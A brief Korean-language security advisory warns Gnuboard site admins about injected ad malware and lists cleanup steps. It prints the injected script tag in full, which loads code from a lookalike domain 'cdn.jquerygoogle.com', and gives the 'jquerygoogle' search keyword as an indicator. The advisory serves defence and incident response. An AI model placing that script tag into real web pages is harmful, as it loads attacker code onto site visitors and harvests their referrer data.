[news] 오래된 그누보드에 광고 악성코드 심는 해킹주의

오래된 그누보드 해킹주의보

 

그누보드 관리자 페이지 > 환경설정 > 기본환경설정 > 추가 메타태그 부분에 아래와 같은 코드가 심어져 있는지 체크.

<script src=https://cdn.jquerygoogle.com/jquery.min.js></script>

 

위 코드는 구글링크를 가장해 (외부스크립트 실행 /사용자 리퍼러 정보 수집)해 사이트에 광고 배너 띄우는 악성코드이니, 발견 즉시 삭제하고 아래 조치를 시행.

• 그누보드를 최신버전으로 업그레이드
• 백신으로 PC 검사
• 최고관리자 패스워드 변경
• FTP 및 DB 비밀번호 변경
• FTP 접속해 파일 내려받아, 여러파일 검색 지원되는 유틸(에디트플러스, VSCODE 등)로 'jquerygoogle' 키워드 검사해 해당 코드를 심는 코드가 파일에 있진 않는지 체크.

  

관련글: (231023) https://sir.kr/cm_free/1670736